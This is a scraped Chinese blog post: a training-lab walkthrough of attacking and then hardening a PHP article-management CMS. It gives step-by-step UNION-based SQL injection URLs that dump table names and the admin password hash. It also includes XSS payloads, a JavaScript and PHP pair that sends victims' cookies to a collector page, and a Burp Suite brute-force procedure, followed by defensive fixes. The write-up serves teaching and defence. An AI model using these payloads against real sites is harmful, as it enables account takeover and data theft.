当前位置: 首页 > news >正文

世界最新军事新闻最新消息百度优化服务

世界最新军事新闻最新消息,百度优化服务,wordpress彩色字体,wordpress 5.0文章编辑教程大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训 在当今数字化时代#xff0c;大数据技术的迅猛发展带来了前所未有的数据增长#xff0c;同时也催生了对数据安全和网络安全的更为迫切的需求。本篇博客将聚焦于大数据技术背景下的数据安全与网络安全#xff…大数据技术之数据安全与网络安全——CMS靶场(文章管理系统)实训 在当今数字化时代大数据技术的迅猛发展带来了前所未有的数据增长同时也催生了对数据安全和网络安全的更为迫切的需求。本篇博客将聚焦于大数据技术背景下的数据安全与网络安全并通过CMS文章管理系统靶场实训深入探讨相应的解决方案与应对策略。 数据与网络安全作为保障大数据系统正常运行的基石同样备受关注。今天写博客时候发现自己很久没更新数据安全与网络安全方面的内容了于是花了点时间写一篇CMS靶场实训博客。本文通过CMS靶场实训深入分析CMS系统的安全漏洞探讨防范措施提供实战经验和攻防能力有助于加强大数据与网络安全意识。 一、实训项目要求 环境部署正确部署CMS网站并运行。通过工具,列出CMS网站的文件目录结构。搜集CMS网站的各项信息.通过工具或代码审计详细列出CMS 网站的漏洞缺陷。给出CMS网站的加固方案。 二、环境 系统环境Windows10IP:192.168.95.200根据实际情况虚拟机可联网 过程与分析 1.环境部署正确部署CMS网站并运行。 Phpstudy版本为2016版本解压缩文件并下载安装 安装成功并启动Apache和MySQL服务 打开phpstudy文件目录找到www文件夹 解压缩CMS靶场环境文件到www目录下 打开C:\phpStudy\WWW\cms\include路径下的database.inc文件编辑该文件并修改数据库密码为root然后ctrls保存 修改完文件后重启phpStudy更新配置文件信息。 重启phpStudy后打开浏览器输入127.0.0.1看到phpMyAdmin目录进入该网页。 输入账号和密码都是root 进入数据库后点击导入将sql文件导入数据库 成功将CMS导入数据库 浏览器输入127.0.0.1/cms成功部署CMS网站 点开留言板也是可以正常运行 这样就正确部署CMS网站并能够运行。 2.通过工具,列出CMS网站的文件目录结构。 AWVS安全扫描操作方法 点击File – New – Web Site Scanor工具栏上的“New Scan”打开创建页面如下图 开始扫描127.0.0.1/cms/admin/login.php 3.搜集CMS网站的各项信息. 我们在主页随便点击两条新闻进行对比发现上面除了url中id33id32之外没有任何区别。 通过上面信息我们发现更改id参数网站会自动跳转页面。 我们试试在后面输入?id33 order by 999 -- http://127.0.0.1/cms/show.php?id33 order by 999 --出现报错Unknown column 999 in order clause 我们可以知道该网页存在sql数值型注入。 在主页使用搜索功能可以看到使用的是 GET 方法传参用于搜索的参数是 keywords 和 button。 直接向 keywords 传递参数“”由于参数被传递进入后会被直接执行所以可以看到我们注入的脚本执行成功。 在keywords后面加入 发现我们的参数能够被执行判断这里存在反射型 XSS漏洞。 我们在留言板留言输入 scriptalart(/xss/)/script 登陆后台出现弹窗验证 由这里信息我们可以知道该网站存在存储型xss漏洞。 4.通过工具或代码审计详细列出CMS 网站的漏洞缺陷。 注入点判断 ?id32 也可以用?id32 order by 999- -- 判断是字符型还是数字型 试试加个单引号 加了单引号后有明显报错根据报错判断存在数字型注入如果报错里面有数字就是字符型如果没有就是数字型 判断是否有布尔类型状态 and11真 and12假 试试http://127.0.0.1/cms/show.php?id32 and 11 试试 http://127.0.0.1/cms/show.php?id32 and 12两次页面相同一般认为没有布尔类型状态不同代表有布尔类型状态 我们使用 order by 函数进行判断因为我们要使用联合查询并且在 ?id32前面有一条select查询语句要使用联合查询的话需要判断前面语句有多少列 我们随便试试order by 10看看发现页面没有反应 再试试http://127.0.0.1/cms/show.php?id32%20order%20by%2020 发现报错 Unknown column ‘20’ in ‘order clause’ 那可能就是在10-20之间我们在10-20之间一个一个试试。 我们继续验证发现他有15个列 点击执行发现页面正常因为我们不知道表名但是根据mysql数据库特性select语句在执行过程中并不需要指定表名。 因为页面显示的是第一章表的内容那我们可以考虑让第一张虚拟表的查询条件为假显示第二条记录从而构造sql语句 我们已经知道有15个列表我们试试select语句并用–将后面语句注释掉。 127.0.0.1/cms/show.php?id-32 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 --使用and 12或-32我们发现页面回显3,11两个数字我们就可以把这两个数字用函数替换掉 将3替换成version()函数函数11替换成database(). 127.0.0.1/cms/show.php/?id-32 union select 1,2,version(),4,5,6,7,8,9,10,database(),12,13,14,15 --这样就已经可以证明存在sql注入漏洞了 为了拿到后台管理员的账密 我们把databases换成hexgroup_concat(table_name)就得到了十六进制 在SQL注入攻击中负数ID常被用于欺骗程序从而触发漏洞。攻击者可能会通过设置参数值为负数来实现对 WHERE 子句的修改以便将恶意的查询语句拼接到原始 SQL 语句的末尾。 我们可以这样输入 127.0.0.1/cms/show.php?id-32 union select 1,2,version(),4,5,6,7,8,9,10, hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schemadatabase() information_schema 是一个MySQL数据库中的系统数据库它包含了关于MySQL服务器中所有数据库、表、列、索引、用户等对象的元数据信息。 它是一个只读的数据字典其内部存储的信息可以通过SQL查询来获取包括各类数据库对象的名称、类型、大小、权限、注释等详细信息。因此使用 information_schema 数据库可以方便地查询和管理所有数据库对象的元数据信息 information_schema.TABLES包含所有表的信息如表名、表类型、表引擎、表创建时间等。 得到16进制的编码 636D735F61727469636C652C636D735F63617465676F72792C636D735F66696C652C636D735F667269656E646C696E6B2C636D735F6D6573736167652C636D735F6E6F746963652C636D735F706167652C636D735F7573657273我们用解码工具去还原十六进制 得到cms表名 cms_article,cms_category,cms_file,cms_friendlink,cms_message,cms_notice,cms_page, cms_users我们试试查询数据库中的cms_users表 127.0.0.1/cms/show.php?id-32 union select 1,2,version(),4,5,6,7,8,9,10, hex(group_concat(table_name)),12,13,14,15 from information_schema.tables where table_schemadatabase() and table_namecms_users发现不行试试在cms_user加个单引号 127.0.0.1/cms/show.php?id-32 union select 1,2,version(),4,5,6,7,8,9,10, hex(group_concat(column_name)),12,13,14,15 from information_schema.columns s where table_schemadatabase() and table_name cms_users其中hex(group_concat(column_name)) 是一个 SQL 查询语句用于计算一个字符串列中所有字符的十六进制编码值。具体来说它会将该列中的所有字符串连接起来然后使用 group_concat 函数将它们合并成一个单一的字符串。接着使用 hex 函数将这个字符串转换为十六进制编码值。information_schema.COLUMNS包含所有表列的信息如列名、列数据类型、列是否为 NULL 等。 这样就可以得到: 7573657269642C757365726E616D652C70617373776F7264 该SQL注入语句的目的是通过获取 cms_users 表的名称和当前数据库的版本号来获取有关 cms 数据库的信息 将得到的数字放到网页解码工具进行解码 userid,username,password就得到了三个字段的内容我们根据顺序查询username和password就可以 我们直接查表用从concat函数在 ASCII 编码中0x3a 是一个十六进制值对应于 ASCII 字符 “:”。因此当将 0x3a 作为字符串参数传递给 SQL 函数时它会被解释为 “:” 字符。 127.0.0.1/cms/show.php?id-32 union select 1,2,version(),4,5,6,7,8,9,10,concat(username,0x3a,password),12,13,14,15 from cms_users我们就得到了账号和加密后的密码 admin:e10adc3949ba59abbe56e057f20f883e密码是用密文的形式保存在数据库中观察密文得知是md5加密我们可以用md5在线解密破解,md5解密加密来进行解密可以忽略加密类型。 得到了管理员账号和密码 账号admin 密码123456 我们尝试看能不能登录 最终也可以成功登入后台 XSS注入 反射型 XSS cms文章管理系统的留言板存在xss漏洞我们通过构造代码进行注入 我们先试试输入留言 留言成功我们登录后台查看留言情况。 发现触发xss弹窗并且留言成功 查看网页源码后发现我们构造的payload已经成功被嵌入解析。 获取管理员的cookie 获取CMS后台管理员的cookie经过前面的测试我们知道在该CMS文章系统前台的留言板存在xss漏洞因此我们可以通过存储型的xss注入利用JavaScript获取cookie再传送到我们自己的网站底下。 我们先写好相应的脚本文件 getcookie.js: function getcookie(){var urlhttp://127.0.0.1/cms/getcookie.php;var data cookiedocument.cookie;var xmlhttp new XMLHttpRequest();xmlhttp.open(POST,url);xmlhttp.setRequestHeader(Content-Type,application/x-www-form-urlencoded);//content-type表名内容类型决定浏览器以什么形式进行编码读取这个文件。//application/x-www-form-urlencoded:最常见的POST提交数据的方式xmlhttp.send(data); } getcookie(); getcookie.php: ?php$cookie$_POST[cookie];file_put_contents(cookie.txt, $cookie.\n,FILE_APPEND); ?在CMS文章系统的留言板注入代码 script srchttp://127.0.0.1/cms/getcookie.js/script然后我们模拟管理员在后台审核留言板的内容触发xss攻击 最终拿到管理员的cookie: 这样我们获得了CMS文章管理系统后台管理员的cookie。 使用burpsuite抓包进行爆破 进入客户机的控制台。 打开浏览器登录页面浏览器跳转到正常登入界面。浏览器网址是http://127.0.0.1/cms/index.php 打开Burp Suite。 在浏览器网络代理设置HTTP代理为127.0.0.1端口号为8080【确定】保存。 抓包之前先解决中文乱码问题设置为宋体 启动burpsuite进行抓包。 设置代理 然后在浏览器的登录界面随便输入一个用户名admin随意输入密码点击“登录”BurpSuite就会自动抓取页面向服务器发送的数据包。 浏览器网址是 在抓取的包内容界面右击将选择“Send to Intruder”将包内容发送至Intruder界面。 进入Intruder界面。Target小界面的内容不用更改。 转到Positions小界面选择“Clear §”将默认选中要破解的内容去掉。然后选中账号§admin§和密码“123”点击“Add §”添加破解内容。选择“Cluster bomb”。 转到Payloads小界面添加数据字典。如果是破解多个参数则“Payload set”这里可以点击选择“1”、“2”等进行切换添加数据字典。 在payload set 1这里设置第一个要爆破的参数在“Add”后往字典中添加一些常见的账号比如admin、test、root等等。 添加账号、密码字典后点击 Start attack开始爆破。 爆破完成之后会发现最终爆破的结果 我们通过Length不同返回结果对比找到了可以成功登录的账号和密码。 登录验证一下发现账号 密码为 admin 123456 还有Admin 123456 验证一下 最后发现通过burpsuite爆破出来的账号和密码都可以成功登录后台。 CMS网站的加固方案。 要避免数值型 SQL 注入可以采取以下措施 输入验证在将用户输入传递到SQL查询之前请确保对其进行验证和过滤。可以使用 PHP 中的 is_numeric() 函数检查输入是否为数字。 is_numeric() 是 PHP 中的一个内置函数它用于检查给定的变量是否是数字或数字字符串。如果变量是数字或数字字符串则返回 true。否则返回 false 在SQL注入攻击中参数化查询是一种有效的防御措施。它可以将用户输入的数据作为参数传递给SQL查询语句从而避免恶意代码注入。以下是一些关于如何进行参数化查询的常见方法 1.使用预编译语句预编译语句是一种将SQL查询语句和参数绑定在一起的方式。使用预编译语句可以确保用户输入的数据不会被解析为SQL命令。例如可以使用PDO或mysqli_prepare函数来执行预编译语句。 2.使用占位符占位符是一种用于代替实际参数值的特殊字符。在SQL查询语句中使用占位符可以防止恶意代码注入。例如可以使用来代替实际参数值。 3.过滤用户输入在接收用户输入时应该对其进行过滤和验证以确保其符合预期格式。例如只允许输入数字和小数点不允许输入特殊字符等。 4.避免使用动态SQL语句动态SQL语句是指在运行时生成的SQL查询语句。使用动态SQL语句容易受到SQL注入攻击。应该尽量避免使用动态SQL语句或者使用参数化查询来替代。 最小化特权使用最小化特权原则即仅为执行所需操作的用户分配必要的权限。这样即使攻击者成功注入 SQL 查询他们也无法执行敏感操作或访问敏感数据。 1.只授予必要的权限在创建数据库用户和授权时只授予其完成任务所需的最小权限。例如只允许数据库用户读取和写入数据而不允许其执行其他操作。 2.避免使用超级管理员账户超级管理员账户具有最高的权限因此应该避免使用。如果必须使用超级管理员账户应该对其进行严格的限制和监控。 3.禁用不必要的功能在应用程序中禁用不必要的功能和服务以减少攻击者利用漏洞的可能性。例如禁用远程访问数据库的功能。 4.定期更新和修补软件及时更新和修补软件可以修复已知的漏洞和安全问题从而提高应用程序的安全性。 XSS漏洞防范 对于应对xss攻击可以使用 PHP 中的一些内置函数来过滤和验证用户输入。下面是其中一些常用的函数 strip_tags()从字符串中删除 HTML 和 PHP 标记。这个函数可以帮助防止 XSS 攻击。htmlentities()将特殊字符转换为 HTML 实体。例如将 “” 转换为 “”。这个函数也可以帮助防止 XSS 攻击。addslashes()在字符串中添加反斜杠以转义特殊字符。这个函数可以帮助防止 SQL 注入攻击。intval() 或 floatval()将字符串转换为整数或浮点数类型。这个函数可以帮助确保接受数字格式的输入并避免类型错误。filter_var()使用指定的过滤器过滤变量。例如可以使用 FILTER_VALIDATE_EMAIL 过滤器来验证电子邮件地址。 6.使用 PHP 内置函数 mysqli_real_escape_string() 或 PDO::quote() 等函数对用户输入进行转义以避免特殊字符被错误解释。 XSS的威力主要是取决于JavaScript能够实现的程度XSS跨站脚本的形成原因是对输入输出没有严格过滤导致在页面上可以执行JavaScript等客户端代码我们只要将敏感字符过滤就可以修复XSS跨站漏洞。 修复和防范方法 1.在cookie中设置了HttpOnly属性那么通过JavaScript脚本将无法读取到cookie信息这样能一定程度上防止XSS攻击。 例如原网站cookie设置安全性较低并且该cookie在用户的浏览器中保持长时间即使用户已经退出网站或关闭了浏览器也是如此。如果攻击者能够访问用户计算机或使用同一计算机的其他人则可以利用该cookie访问受保护的页面。 修改setcookie函数并添加ttpOnly属性并修改cookie保存时间 setcookie(‘username’, u s e r n a m e , t i m e ( ) 86400 ∗ 7 , ′ / ′ , ′ ′ , f a l s e , t r u e ) ; i f ( e m p t y ( username, time()86400 * 7, /, , false, true); if (empty( username,time()86400∗7,′/′,′′,false,true);if(empty(username) || empty($password)){ exit(“”); } 这里设置setcookie()函数的第6个参数secure留空以便允许使用非加密协议如HTTP。第7个参数HttpOnly设置为true以确保该cookie仅通过HTTP头传递给服务器并且无法通过JavaScript等客户端脚本读取到该cookie的值。 2.假定所有输入都是可疑的必须对所有输入中的script、iframe等字样进行严格的检查。这里的输入不仅仅是用户可以直接交互的输入接口也包括HTTP请求中的cookie中的变量HTTP请求头部中的变量等。 3.不仅验证数据的类型还要验证其格式、长度、范围和内容 4.过滤“” 、“” 将用户输入放入引号间基本实现数据与代码隔离过滤双引号防止用户跨越许可的标记添加自定义标记过滤TAB和空格,防止关键字被拆分过滤script关键字过滤#,防止HTML属性绕过检查。在客户端和服务器端同时做数据的验证与过滤。 5.对输出的数据也要检查数据库里的值有可能会在一个大网站的多处都有输出即使在输入做了编码等操作在各处的输出点时也要安全检查。 例如对用户登录验证进行加固 通过使用 PHP 内置的过滤器函数 filter_input() 进行验证和过滤并使用参数化查询或预处理语句来执行 SQL 查询可以加强代码的安全性。在原来代码中使用 setcookie() 函数将用户名和用户 ID 存储在 cookie 中。可以通过改写代码使用会话机制等更安全的方式来存储和传递这些信息。这样就保证了一些敏感信息不易被窃取。 在密码加密方面通过PHP 内置的 password_hash() 和 password_verify() 函数可以在不需要额外编写代码的情况下快速、轻松地对密码进行安全加密和验证。 加固之后的代码 // 验证和过滤用户输入的数据 $username filter_input(INPUT_POST, username, FILTER_SANITIZE_STRING); $password filter_input(INPUT_POST, password, FILTER_SANITIZE_STRING);if (empty($username) || empty($password)) {exit(scriptalert(用户名或密码不能为空);window.history.go(-1)/script); }// 使用参数化查询执行 SQL 查询 $stmt $db-prepare(SELECT userid, password FROM cms_users WHERE username ?); $stmt-execute([$username]); $user_row $stmt-fetch(PDO::FETCH_ASSOC);if (!empty($user_row) password_verify($password, $user_row[password])) {// 不存储敏感信息到 cookie而是使用会话机制等更安全的方式来存储和传递数据$_SESSION[userid] $user_row[userid];header(Location: index.php); } else {exit(scriptalert(用户名或密码不正确);window.history.go(-1)/script);将原来的 md5() 加密替换为 password_hash() 函数来使用 bcrypt 算法进行密码加密。同时还使用了 password_verify() 函数来验证用户提交的密码是否和数据库中存储的密码匹配。加强了安全防御。 对于网站的存在弱口令被burpsuite爆破可以采取下面措施。 1.在登录页面中添加验证码进行人机识别。这样可以有效地防止BurpSuite等工具进行自动化爆破。 2.强制要求使用更加复杂的密码包括数字、字母和特殊字符混合比如aDkaSda123*.、ssfGkjh8g*.1、这种复杂密码必要时候限制尝试登录次数。 3.在响应头中添加Cache-Control或Pragma指令以禁用浏览器缓存从而保护敏感数据不会被缓存到本地计算机。 4.使用SSL / TLS加密所有传输的数据以防止BurpSuite拦截和读取提交的数据。例如将协议从HTTP更改为HTTPS。 5.监视服务器日志以检测和阻止意外的登录尝试。如果发现被攻击爆破等异常行为可以立即采取预防措施。 OK,通过本文cms靶场的实训学习希望有助于各位掌握恶意代码攻击的基本原理和相关操作针对一些漏洞的加固方案能提高大家的安全意识和实操水平。 后面会持续更新更多优质内容感谢各位的喜欢与支持
文章转载自:
http://www.morning.gycyt.cn.gov.cn.gycyt.cn
http://www.morning.wsnbg.cn.gov.cn.wsnbg.cn
http://www.morning.crhd.cn.gov.cn.crhd.cn
http://www.morning.qxxj.cn.gov.cn.qxxj.cn
http://www.morning.pwksz.cn.gov.cn.pwksz.cn
http://www.morning.pbwcq.cn.gov.cn.pbwcq.cn
http://www.morning.jzsgn.cn.gov.cn.jzsgn.cn
http://www.morning.cnwpb.cn.gov.cn.cnwpb.cn
http://www.morning.hsrpr.cn.gov.cn.hsrpr.cn
http://www.morning.jcrlx.cn.gov.cn.jcrlx.cn
http://www.morning.rsmtx.cn.gov.cn.rsmtx.cn
http://www.morning.dxhdn.cn.gov.cn.dxhdn.cn
http://www.morning.tzzfy.cn.gov.cn.tzzfy.cn
http://www.morning.nwjd.cn.gov.cn.nwjd.cn
http://www.morning.bkfdf.cn.gov.cn.bkfdf.cn
http://www.morning.gblrn.cn.gov.cn.gblrn.cn
http://www.morning.jjnry.cn.gov.cn.jjnry.cn
http://www.morning.lptjt.cn.gov.cn.lptjt.cn
http://www.morning.bgqr.cn.gov.cn.bgqr.cn
http://www.morning.bkryb.cn.gov.cn.bkryb.cn
http://www.morning.ayftwl.cn.gov.cn.ayftwl.cn
http://www.morning.bsqbg.cn.gov.cn.bsqbg.cn
http://www.morning.llyqm.cn.gov.cn.llyqm.cn
http://www.morning.lswgs.cn.gov.cn.lswgs.cn
http://www.morning.zqbrw.cn.gov.cn.zqbrw.cn
http://www.morning.hgkbj.cn.gov.cn.hgkbj.cn
http://www.morning.srbl.cn.gov.cn.srbl.cn
http://www.morning.mooncore.cn.gov.cn.mooncore.cn
http://www.morning.skqfx.cn.gov.cn.skqfx.cn
http://www.morning.glswq.cn.gov.cn.glswq.cn
http://www.morning.qwzpd.cn.gov.cn.qwzpd.cn
http://www.morning.zlhcw.cn.gov.cn.zlhcw.cn
http://www.morning.kjgdm.cn.gov.cn.kjgdm.cn
http://www.morning.mcfjq.cn.gov.cn.mcfjq.cn
http://www.morning.fnbtn.cn.gov.cn.fnbtn.cn
http://www.morning.knnc.cn.gov.cn.knnc.cn
http://www.morning.tpnx.cn.gov.cn.tpnx.cn
http://www.morning.zsleyuan.cn.gov.cn.zsleyuan.cn
http://www.morning.dsprl.cn.gov.cn.dsprl.cn
http://www.morning.jmdpp.cn.gov.cn.jmdpp.cn
http://www.morning.yqyhr.cn.gov.cn.yqyhr.cn
http://www.morning.pmdlk.cn.gov.cn.pmdlk.cn
http://www.morning.mrxgm.cn.gov.cn.mrxgm.cn
http://www.morning.zdqsc.cn.gov.cn.zdqsc.cn
http://www.morning.bnrnb.cn.gov.cn.bnrnb.cn
http://www.morning.nchsz.cn.gov.cn.nchsz.cn
http://www.morning.pdtjj.cn.gov.cn.pdtjj.cn
http://www.morning.fdrch.cn.gov.cn.fdrch.cn
http://www.morning.wrlqr.cn.gov.cn.wrlqr.cn
http://www.morning.tgyzk.cn.gov.cn.tgyzk.cn
http://www.morning.jxfsm.cn.gov.cn.jxfsm.cn
http://www.morning.rhpy.cn.gov.cn.rhpy.cn
http://www.morning.kpcxj.cn.gov.cn.kpcxj.cn
http://www.morning.pznqt.cn.gov.cn.pznqt.cn
http://www.morning.mkfhx.cn.gov.cn.mkfhx.cn
http://www.morning.dtgjt.cn.gov.cn.dtgjt.cn
http://www.morning.yhplt.cn.gov.cn.yhplt.cn
http://www.morning.lcplz.cn.gov.cn.lcplz.cn
http://www.morning.bqts.cn.gov.cn.bqts.cn
http://www.morning.qbrs.cn.gov.cn.qbrs.cn
http://www.morning.zwwhq.cn.gov.cn.zwwhq.cn
http://www.morning.kkwbw.cn.gov.cn.kkwbw.cn
http://www.morning.qsy40.cn.gov.cn.qsy40.cn
http://www.morning.gwdnl.cn.gov.cn.gwdnl.cn
http://www.morning.youngbase.cn.gov.cn.youngbase.cn
http://www.morning.ghfrb.cn.gov.cn.ghfrb.cn
http://www.morning.cljpz.cn.gov.cn.cljpz.cn
http://www.morning.lgtzd.cn.gov.cn.lgtzd.cn
http://www.morning.zcwzl.cn.gov.cn.zcwzl.cn
http://www.morning.pdtjj.cn.gov.cn.pdtjj.cn
http://www.morning.xxzjb.cn.gov.cn.xxzjb.cn
http://www.morning.ltdrz.cn.gov.cn.ltdrz.cn
http://www.morning.qtfss.cn.gov.cn.qtfss.cn
http://www.morning.qwrb.cn.gov.cn.qwrb.cn
http://www.morning.wwkdh.cn.gov.cn.wwkdh.cn
http://www.morning.rbkdg.cn.gov.cn.rbkdg.cn
http://www.morning.nfmlt.cn.gov.cn.nfmlt.cn
http://www.morning.jydky.cn.gov.cn.jydky.cn
http://www.morning.rgmd.cn.gov.cn.rgmd.cn
http://www.morning.qxlxs.cn.gov.cn.qxlxs.cn
http://www.tj-hxxt.cn/news/246909.html

相关文章:

  • 自己主机做网站服务器吗滕州做网站
  • 手机的网站建设目标网站建设属营改增范围吗
  • 外贸网站怎么做外链网络经营许可证查询
  • 成都网站建设推广在360建筑网官网怎么登录
  • 网站建设中+网页代码网站建设座谈会上的发言
  • 如何建设一个工业品采购网站Wordpress 源码 商城
  • 更新网站的步骤微信小程序 模板
  • 做一个网站的费用给网站做路由
  • 如何将网站上传到万网主机上海闵行刚刚发生的
  • 百度蜘蛛开发网站网站建设价格优惠
  • 淮安做网站的公司有哪些公司免费网络密码
  • 建设一个网站思路深圳画册制作
  • 暖通毕业设计代做网站快递网站域名更换
  • 个人备案域名可以做哪些网站wordpress如何更新临时域名
  • 江苏住房和建设厅网站百度指数三个功能模块
  • 博客网站建设的流程深圳市网络营销推广平台
  • 建网站论坛python安卓app开发
  • 株洲做网站定制电子商务网站案例分析
  • 酒类做网站wordpress网站首页
  • 网页美工设计网站沈阳网站页面设计公司
  • 有赞做网站3营销型网站建设
  • 设计师发布作品的网站网站的建设怎么弄
  • 怎么申请公司注册昆明seo和网络推广
  • 做网站行业现状如何免费域名注册
  • 面包店网站建设规划书内江建设网站
  • 网页设计与网站建设区别公众号关注推广
  • 电子商务实验网站建设实训过程青海建设厅质检站网站
  • 养殖推广网站怎么做网站建设公司公司我我提供一个平台
  • 电商网站建设开发公司永嘉县建设局网站
  • 同一个服务器做两个网站高端网站建设企业官网建设